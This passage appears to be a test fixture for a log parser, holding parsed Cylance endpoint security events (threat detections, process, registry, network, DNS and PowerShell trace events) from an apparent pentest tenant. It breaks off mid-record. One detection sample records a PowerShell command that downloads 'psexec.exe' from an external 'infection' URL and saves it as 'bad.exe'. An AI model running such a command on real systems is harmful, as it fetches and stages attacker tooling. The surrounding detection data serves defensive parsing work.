(Windows Zone (Default)), Is Malware: True, Is Unique To Cylance: False, Threat Classification: Malware - Trojan, Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + Status: "Quarantined" + additional_details: "" + auto_run: "False" + cylance_score: 96 + detected_by: "FileWatcher" + device_id: "0929f443-2a56-46b3-bcfe-fc598da81d8b" + device_name: "Unknown (test1)" + drive_type: "Internal Hard Drive" + event_type: "Threat" + evt: + name: "threat_changed" + file_name: "fakefile1" + file_path: "c:/test/test1" + file_state: "Unsafe" + file_type: "Executable" + found_date: "11/18/2025 8:40:23 AM" + ip_addresses: + - "10.0.0.0" + is_malware: "True" + is_running: "False" + is_unique_to_cylance: "False" + md5: "E719222BD4624F1C0A92117FE33E261a" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + sha256: "D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + threat_classification: "Malware - Trojan" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Threat, Event Name: threat_changed, Device Name: Unknown (test1), IP Address: (10.0.0.0), File Name: fakefile1, Path: c:/test/test1, Drive Type: Internal Hard Drive, SHA256: D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9, MD5: E719222BD4624F1C0A92117FE33E261a, Status: Quarantined, Cylance Score: 96, Found Date: 11/18/2025 8:40:23 AM, File Type: Executable, Is Running: False, Auto Run: False, Detected By: FileWatcher, Zone Names: (Windows Zone (Default)), Is Malware: True, Is Unique To Cylance: False, Threat Classification: Malware - Trojan, Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8b, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ThreatClassification, Event Name: ThreatUpdated, Threat Class: Malware, Threat Subclass: Trojan, Threat Family: diskwriter, SHA256: 3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149, MD5: D50E739C71C9513B306F3393762CFC85" + result: + custom: + additional_details: "" + event_type: "ThreatClassification" + evt: + name: "ThreatUpdated" + md5: "D50E739C71C9513B306F3393762CFC85" + service: "desktop-events" + sha256: "3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + threat_class: "Malware" + threat_family: "diskwriter" + threat_subclass: "Trojan" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ThreatClassification, Event Name: ThreatUpdated, Threat Class: Malware, Threat Subclass: Trojan, Threat Family: diskwriter, SHA256: 3AAB8621827F18FF282BAB5635A3AA1333989E533539A6C9B6BC891E92258149, MD5: D50E739C71C9513B306F3393762CFC85" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeProcessEvent, Event Name: OpticsCaeProcessEvent, Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: Jeffs Take 2 Powershell Download, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received Timestamp: 2022-06-23T12:54:41Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target Process Name: powershell.exe, Target Process Owner: PENTEST//Administrator, Target Process ImageFileSha256: BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process Command Line: powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + result: + custom: + additional_details: "" + description: "Jeffs Take 2 Powershell Download" + detection_rule_id: "3f110342-88f8-11ec-a8a3-0242ac120002" + device_id: "3514593e-7405-4319-8ca5-8ec876bf0195" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER2" + event_id: "dbe47fda-f37b-42cc-a308-9675feb7e36a" + event_received_timestamp: "2022-06-23T12:54:41Z" + event_timestamp: "2022-06-23T12:54:15.811Z" + event_type: "OpticsCaeProcessEvent" + evt: + name: "OpticsCaeProcessEvent" + instigating_process_command_line: "\"C:\\Windows\\system32\\cmd.exe\" " + instigating_process_file_path: "c:\\windows\\system32\\cmd.exe" + instigating_process_imagefilesha256: "935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2" + instigating_process_name: "cmd.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "High" + status: "critical" + target_process_command_line: "powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\"" + target_process_file_path: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + target_process_imagefilesha256: "BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436" + target_process_name: "powershell.exe" + target_process_owner: "PENTEST//Administrator" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(39BFDA7FEF71490584AAB4F163142350)" + zone_names: "(Jeff Test)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeProcessEvent, Event Name: OpticsCaeProcessEvent, Device Name: SECURITYSERVER2, Zone Names: (Jeff Test), Event Id: dbe47fda-f37b-42cc-a308-9675feb7e36a, Severity: High, Description: Jeffs Take 2 Powershell Download, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: 935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2, Event Timestamp: 2022-06-23T12:54:15.811Z, Event Received Timestamp: 2022-06-23T12:54:41Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (39BFDA7FEF71490584AAB4F163142350), Detection Rule Id: 3f110342-88f8-11ec-a8a3-0242ac120002, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target Process Name: powershell.exe, Target Process Owner: PENTEST//Administrator, Target Process ImageFileSha256: BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436, Device Id: 3514593e-7405-4319-8ca5-8ec876bf0195, Target Process Command Line: powershell -command \"(new-object SYstem.Net.WebClient).DownloadFile('https://zaphod.cnerds.net/infection/psexec.exe', 'C:\\dver\\bad.exe')\", Target Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeFileEvent, Event Name: OpticsCaeFileEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, Description: SYSLOG detections - Looking for a created file cylancetest.txt, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt, Target File Owner: BUILTIN//Administrators, Target File Sha256: ueirjftkgpokfjrkjfmlrmf, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - Looking for a created file cylancetest.txt" + detection_rule_id: "74bd0e7e-281a-4d7b-9f84-d0f51346782c" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "f4739af7-9c8b-4dc0-aeb7-2d4533445d49" + event_received_timestamp: "2022-06-28T18:09:36Z" + event_timestamp: "2022-06-28T18:09:32.693Z" + event_type: "OpticsCaeFileEvent" + evt: + name: "OpticsCaeFileEvent" + instigating_process_command_line: "\"C:\\Windows\\system32\\cmd.exe\" " + instigating_process_file_path: "c:\\windows\\system32\\cmd.exe" + instigating_process_imagefilesha256: "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527" + instigating_process_name: "cmd.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + target_file_owner: "BUILTIN//Administrators" + target_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt" + target_process_imagefilesha256: "ueirjftkgpokfjrkjfmlrmf" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeFileEvent, Event Name: OpticsCaeFileEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: f4739af7-9c8b-4dc0-aeb7-2d4533445d49, Severity: Medium, Description: SYSLOG detections - Looking for a created file cylancetest.txt, Instigating Process Name: cmd.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527, Event Timestamp: 2022-06-28T18:09:32.693Z, Event Received Timestamp: 2022-06-28T18:09:36Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74bd0e7e-281a-4d7b-9f84-d0f51346782c, Instigating Process Command Line: \"C:\\Windows\\system32\\cmd.exe\" , Instigating Process File Path: c:\\windows\\system32\\cmd.exe, Target File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\cylancetest.txt, Target File Owner: BUILTIN//Administrators, Target File Sha256: ueirjftkgpokfjrkjfmlrmf, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeRegistryEvent, Event Name: OpticsCaeRegistryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, Description: SYSLOG detections - RegistryKey \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Instigating Process Name: ICreatePersistencePoints.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, Event Timestamp: 2022-06-28T18:08:49.103Z, Event Received Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, Instigating Process Command Line: ICreatePersistencePoints.exe --trigger 0, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe, Target Registry KeyPath: HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Target Registry ValueName: Unknown, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - RegistryKey \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext" + detection_rule_id: "74354415-7d28-4f31-830d-72a14c0c3d8b" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "6d33d636-dcdc-48c2-911a-ead99ac17f88" + event_received_timestamp: "2022-06-28T18:08:54Z" + event_timestamp: "2022-06-28T18:08:49.103Z" + event_type: "OpticsCaeRegistryEvent" + evt: + name: "OpticsCaeRegistryEvent" + instigating_process_command_line: "ICreatePersistencePoints.exe --trigger 0" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe" + instigating_process_imagefilesha256: "F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5" + instigating_process_name: "ICreatePersistencePoints.exe" + instigating_process_owner: "PENTEST//Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + target_registry_keypath: "HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext" + target_registry_valuename: "Unknown" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeRegistryEvent, Event Name: OpticsCaeRegistryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6d33d636-dcdc-48c2-911a-ead99ac17f88, Severity: Medium, Description: SYSLOG detections - RegistryKey \\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Instigating Process Name: ICreatePersistencePoints.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F83926AB855E860C9B1A6D72EB6024D9E1D569A59E4901A62E8543B1C978D5E5, Event Timestamp: 2022-06-28T18:08:49.103Z, Event Received Timestamp: 2022-06-28T18:08:54Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 74354415-7d28-4f31-830d-72a14c0c3d8b, Instigating Process Command Line: ICreatePersistencePoints.exe --trigger 0, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatepersistencepoints.exe, Target Registry KeyPath: HKLM\\software\\classes\\*\\shellex\\contextmenuhandlers\\cywareshlext, Target Registry ValueName: Unknown, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeNetworkEvent, Event Name: OpticsCaeNetworkEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 23a04c4c-1a97-4a58-b4bc-fadadb729e30, Severity: Medium, Description: SYSLOG detections - Looking for NetworkConnection 8.8.8.9, Instigating Process Name: ICreateNetworkConnections.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009, Event Timestamp: 2022-06-28T18:09:56.392Z, Event Received Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB), Detection Rule Id: fdac76c0-5c6b-4b6f-8062-e074457afe3e, Instigating Process Command Line: ICreateNetworkConnections.exe --sequential 8.9.8.8, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe, Destination IP: 10.8.8.81, Destination Port: 29286, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1959, Source IP: 192.168.254.108, Source Port: 52910" + result: + custom: + additional_details: "" + description: "SYSLOG detections - Looking for NetworkConnection 8.8.8.9" + detection_rule_id: "fdac76c0-5c6b-4b6f-8062-e074457afe3e" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1959" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "23a04c4c-1a97-4a58-b4bc-fadadb729e30" + event_received_timestamp: "2022-06-28T18:10:00Z" + event_timestamp: "2022-06-28T18:09:56.392Z" + event_type: "OpticsCaeNetworkEvent" + evt: + name: "OpticsCaeNetworkEvent" + instigating_process_command_line: "ICreateNetworkConnections.exe --sequential 8.9.8.8" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe" + instigating_process_imagefilesha256: "F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009" + instigating_process_name: "ICreateNetworkConnections.exe" + instigating_process_owner: "PENTEST//Administrator" + network: + client: + geoip: {} + ip: "192.168.254.108" + port: "52910" + destination: + geoip: {} + ip: "10.8.8.81" + port: "29286" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeNetworkEvent, Event Name: OpticsCaeNetworkEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 23a04c4c-1a97-4a58-b4bc-fadadb729e30, Severity: Medium, Description: SYSLOG detections - Looking for NetworkConnection 8.8.8.9, Instigating Process Name: ICreateNetworkConnections.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: F816E73FFAD0CA8684B6E44292276DD9B9CB8890ABAA732A7AEB283B46D32009, Event Timestamp: 2022-06-28T18:09:56.392Z, Event Received Timestamp: 2022-06-28T18:10:00Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470202C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAB), Detection Rule Id: fdac76c0-5c6b-4b6f-8062-e074457afe3e, Instigating Process Command Line: ICreateNetworkConnections.exe --sequential 8.9.8.8, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\syslog_test_cae_rules\\icreatenetworkconnections.exe, Destination IP: 10.8.8.81, Destination Port: 29286, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1959, Source IP: 192.168.254.108, Source Port: 52910" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeDnsEvent, Event Name: OpticsCaeDnsEvent, Device Name: SECURITYSERVER, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, Description: Win_Suspicious_DNSLength_MitreT1071, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Target Domain Name: 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., Resolved Address: securityserver.Pentest.Local, Resolved Address Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + result: + custom: + additional_details: "" + description: "Win_Suspicious_DNSLength_MitreT1071" + detection_rule_id: "0da4f7c3-af0d-46be-8f6b-1884a1c67331" + device_id: "41666e82-50e6-4777-88b6-5f2b567027b9" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER" + dns: + question: + name: "7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local." + event_id: "6458f3ac-e527-4922-83ac-654518c3137e" + event_received_timestamp: "2022-06-28T17:34:33Z" + event_timestamp: "2022-06-28T17:34:12.772Z" + event_type: "OpticsCaeDnsEvent" + evt: + name: "OpticsCaeDnsEvent" + instigating_process_command_line: "C:\\Windows\\system32\\lsass.exe" + instigating_process_file_path: "c:\\windows\\system32\\lsass.exe" + instigating_process_imagefilesha256: "91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F" + instigating_process_name: "lsass.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + resolved_address: "securityserver.Pentest.Local" + resolved_address_count: 1 + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeDnsEvent, Event Name: OpticsCaeDnsEvent, Device Name: SECURITYSERVER, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 6458f3ac-e527-4922-83ac-654518c3137e, Severity: Medium, Description: Win_Suspicious_DNSLength_MitreT1071, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 91EAB6178A9BB2B268E7438E54B128F939C0BDF5BD8AC8B15EFCAF0572AADC3F, Event Timestamp: 2022-06-28T17:34:12.772Z, Event Received Timestamp: 2022-06-28T17:34:33Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 0da4f7c3-af0d-46be-8f6b-1884a1c67331, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Target Domain Name: 7f2a98df-486e-4cec-8d6e-c227073955e6._msdcs.Pentest.Local., Resolved Address: securityserver.Pentest.Local, Resolved Address Count: 1, Device Id: 41666e82-50e6-4777-88b6-5f2b567027b9" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeLogEvent, Event Name: OpticsCaeLogEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security Provider: SecurityAuditProvider, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "Win_CreateAccount_MitreT1136" + detection_rule_id: "266e750f-a838-4974-9afc-20cb863031cc" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "ba8810a9-afac-4579-82a2-638f0f584d60" + event_received_timestamp: "2022-06-28T18:17:10Z" + event_timestamp: "2022-06-28T18:17:05.001Z" + event_type: "OpticsCaeLogEvent" + evt: + name: "OpticsCaeLogEvent" + instigating_process_command_line: "C:\\Windows\\system32\\lsass.exe" + instigating_process_file_path: "c:\\windows\\system32\\lsass.exe" + instigating_process_imagefilesha256: "BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F" + instigating_process_name: "lsass.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + security_provider: "SecurityAuditProvider" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + windows_event_id: "4720" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,JeffSecurityServer)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeLogEvent, Event Name: OpticsCaeLogEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: ba8810a9-afac-4579-82a2-638f0f584d60, Severity: High, Description: Win_CreateAccount_MitreT1136, Instigating Process Name: lsass.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: BBC83E4759D4B82BAD31E371AD679AA414C72273BF97CEE5AED8337ED8A4D79F, Event Timestamp: 2022-06-28T18:17:05.001Z, Event Received Timestamp: 2022-06-28T18:17:10Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 266e750f-a838-4974-9afc-20cb863031cc, Instigating Process Command Line: C:\\Windows\\system32\\lsass.exe, Instigating Process File Path: c:\\windows\\system32\\lsass.exe, Windows Event Id: 4720, Security Provider: SecurityAuditProvider, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaePowershellTraceEvent, Event Name: OpticsCaePowershellTraceEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,JeffSecurityServer), Event Id: 4b199c5c-60dc-4b5c-8dac-86965ba5b051, Severity: Medium, Description: SYSLOG detections - Looking for PowershellTrace get-childitem, Instigating Process Name: powershell.exe, Instigating Process Owner: PENTEST//Administrator, Instigating Process ImageFileSha256: DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C, Event Timestamp: 2022-06-28T18:10:39.547Z, Event Received Timestamp: 2022-06-28T18:10:43Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: 9eb1073c-913f-49ab-9b12-2e5a28dad18d, Instigating Process Command Line: powershell gwmi -class win32_process, Instigating Process File Path: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe, Script Block Text: @{GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"Author=\"Microsoft Corporation\"CompanyName=\"Micros, Script Block Length: 2583, Payload: None, Payload Length: 0, Device Id: c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + result: + custom: + additional_details: "" + description: "SYSLOG detections - Looking for PowershellTrace get-childitem" + detection_rule_id: "9eb1073c-913f-49ab-9b12-2e5a28dad18d" + device_id: "c7b79f9f-4fbe-4f90-9658-ec7e17af1954" + device_last_reported_users: + - 